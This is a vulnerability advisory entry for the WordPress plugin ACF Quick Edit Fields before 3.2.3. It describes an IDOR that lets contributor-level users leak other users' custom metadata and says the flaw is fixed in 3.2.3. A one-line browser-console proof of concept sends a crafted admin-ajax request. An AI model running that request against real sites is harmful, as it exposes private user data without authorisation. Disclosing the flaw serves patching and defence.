ACF Quick Edit Fields < 3.2.3 – Contributor+ User Metadata Leak via IDOR | Plugin Vulnerabilities

Description

The plugin does not restrict what user metadata created by the Advanced-Custom-Fields plugin should be accessible by a given user, enabling those without the `edit_users` capability to leak other users' custom metadata.

Proof of Concept

While logged in as a contributor, visit /wp-admin/edit.php and run the following in your browser console (changing `user_123` and `FIELD_KEY` with whatever you want to have leaked):


(await (fetch(`/wp-admin/admin-ajax.php?action=get_acf_post_meta&_ajax_nonce=${acf_qef['options']['request']['_ajax_nonce']}&object_id=user_123&acf_field_keys=FIELD_KEY`))).text()

Affects Plugins

acf-quickedit-fields

Fixed in 3.2.3

References

URL

https://plugins.trac.wordpress.org/changeset?new=2828750%40acf-quickedit-fields&old=2816195%40acf-quickedit-fields#file89

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Submitter

Chris Grello

Verified

Yes

WPVDB ID

3538e80e-c2c5-4e7b-97c3-b7debad7a136

Timeline

Publicly Published

2022-12-05 (about 3 years ago)

Added

2023-03-30 (about 2 years ago)

Last Updated

2023-03-30 (about 2 years ago)

Other

Published

Title

Published

2022-09-19

Title

Booster for WooCommerce - Subscriber+ Order Status Update

Published

2024-12-12

Title

WP Timetics- AI-powered Appointment Booking Calendar and Online Scheduling Plugin < 1.0.28 - Missing Authorization to Authenticated (Subscriber+) Arbitrary User Deletion

Published

2024-01-04

Title

Relevanssi (Free < 4.22.0, Premium < 2.25.0) - Unauthenticated Private/Draft Post Disclosure

Published

2025-10-17

Title

Event Tickets and Registration < 5.26.6 - Unauthenticated Ticket Payment Bypass

Published

2025-01-31

Title

WP Job Portal < 2.2.7 - Insecure Direct Object Reference to Unauthenticated Arbitrary Resume Download